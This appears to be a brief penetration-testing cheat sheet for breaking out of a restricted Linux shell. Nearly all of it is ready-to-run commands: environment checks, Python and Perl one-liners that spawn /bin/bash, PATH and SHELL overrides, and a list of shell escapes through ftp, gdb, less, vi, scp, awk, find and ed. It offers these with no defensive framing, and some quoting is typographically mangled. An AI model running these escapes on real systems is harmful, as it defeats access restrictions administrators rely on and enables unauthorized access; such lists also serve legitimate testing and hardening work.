Restricted shell escape

check what you can do:

echo $PATH
echo $SHELL
echo $ENV
ls -al bin 

Try and break out:

python -c 'import pty;pty.spawn("/bin/bash")'
perl -e 'exec "/bin/sh";'

export PATH=/bin:/usr/bin:/sbin:$PATH
export SHELL=/bin/sh
set PATH=/bin:/usr/bin:/sbin:$PATH
set SHELL=/bin/sh

cp /bin/sh /current/directory; sh

Taking help of binaries

Some commands let us execute other system commands, often bypassing shell restrictions

• ftp -> !/bin/sh

• gdb -> !/bin/sh

• more/ less/ man -> !/bin/sh

• vi -> :!/bin/sh : Refer Breaking out of Jail : Restricted Shell and Restricted Accounts and Vim Tricks in Linux and Unix

• scp -S /tmp/getMeOut.sh x y : Refer Breaking out of rbash using scp

• awk ‘BEGIN {system(“/bin/sh”)}’

• find / -name someName -exec /bin/sh ;

• tee

• ed --> !'/bin/bash' --> export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin